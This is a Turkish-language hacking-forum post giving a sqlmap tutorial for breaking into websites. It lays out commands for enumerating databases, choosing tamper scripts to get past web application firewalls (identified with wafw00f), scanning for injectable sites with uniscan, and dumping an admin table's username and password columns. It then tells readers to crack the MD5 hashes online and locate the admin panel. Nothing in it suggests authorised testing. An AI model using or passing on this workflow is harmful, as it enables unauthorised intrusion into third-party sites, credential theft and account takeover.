Konuyu Oyla:
  • Toplam: 0 Oy - Ortalama: 0
  • 1
  • 2
  • 3
  • 4
  • 5
SQLMAP KULLANIMI
#1
sqlmap -u Linkleri görebilmek için Üye Olun veya Giriş Yapın. --dbs

bilindiği üzere --dbs databes verilerini çekmemize olanak sağlayan komuttur fakat tek başına herzaman işe yaramayabilir.

sqlmap -u Linkleri görebilmek için Üye Olun veya Giriş Yapın. --dbms "MySql" -v 3 (4) --technique=BEUQ --tamper=)tamper script space2comment olabilir) --dbs

yukarda belirttiğim komutlar belirli güvenlik duvarı üzerinde etki gösterecektir peki ya bu komutlar nedir ne işe yarar??

technique:::teknik demektir U BEUQ iş görür
--cookie:: çerezdir login kısmındaki açıklarda daha hızlı veri çekilir olmazsa olmazdır login kısmı açıklarında
--threads::d.b verilerin daha hızlı çekilmesini sağlar
--tamper::: tamper en önemli olan işlevimizdir waf (güvenlik duvarı) bypass (aşmamız) etmemize yarar
cd/usr/share/sqlmap/tamper/ dan ulaşabilirsiniz.
--no-cast:kullanıcı bilgilerine dokunmadan geçmemize yarar bazen bu istenir genelde shutting down hatasında
--hex:::--no-cast ın tam tersi bilgilerdir
--random-agent , --user-agent ::: timed hatalarda işe yarar
PEKİ YA TAMPER NASIL SEÇİLİR???? EN ÖNEMLİ KONU İŞTE BU smile.png tamper seçimimizi kali terminalinden wafw00f Linkleri görebilmek için Üye Olun veya Giriş Yapın.olarak öğrenebilir ona uygun tamper kodu seçilir ve bypass edilir bazı durumlarda wafw00f güvenlik duvarını tanımaz bu durumda özel tamperler lazım olacaktır scripte göre internetten indirilir cd/usr/share/sqlmap/tamper/ klasörüne yüklenir

değinmişken tam değineyim dedim smile.png sql açıkları nasıl bulunur
1:uniscan ile tarama yaparak
(uniscan -u Linkleri görebilmek için Üye Olun veya Giriş Yapın. -qweds)
2confused.pngafe3
3:acuntenix
belli başlı açık arama programlarıdır tabiki en doğru sonuç uniscan ile bulunur fakat uzun sürdüğü için açık olup olmadığı taramalar arası boş ise anlanır okadar beklenmez.

peki ya verileri çektik ulaştık databese işte ozaman

sqlmap -u Linkleri görebilmek için Üye Olun veya Giriş Yapın. -D databesismi --tables

---ADMİN---

sqlmap -u Linkleri görebilmek için Üye Olun veya Giriş Yapın. -D databesismi -T ADMİN --columns

SİFRE
KULLANICI_ADI

sqlmap -u Linkleri görebilmek için Üye Olun veya Giriş Yapın. -D databesismi -T ADMİN -C SİFRE,KULLANICI_ADI --dump


databes ismimiz şahsa ait olan isim olacaktır information schema her sql dili kullanan sitede mevcuttur işe yaramaz.

şifre geldi 486eqw4e65q123eq şeklinde işte bu MD5 formatında bir şifredir 128 bit şifrelenmiş hiç deneme beyninle kıramazsın kardeşim.google amcada MD5 crack sitelerinden dene olmazsa uzatma beceremezsin her hane başına 64 tane olasılık gelecektir.

tamam şifreyi aldım admin panelini bulamadım napabilirim??

admin paneli bazı betiklerle bulunur fakat bulunamaz ise sitenin en altında scriptler yazar şanslı gününde isen script hazır script ise onu araştır ordan bulacaksın.
Cevapla


Hızlı Menü:


Şu anda bu konuyu okuyanlar: 2 Ziyaretçi

   
Hakkımızda
MyBB, © 2002-2024 MyBB Group Tema yapımcısı: Rankings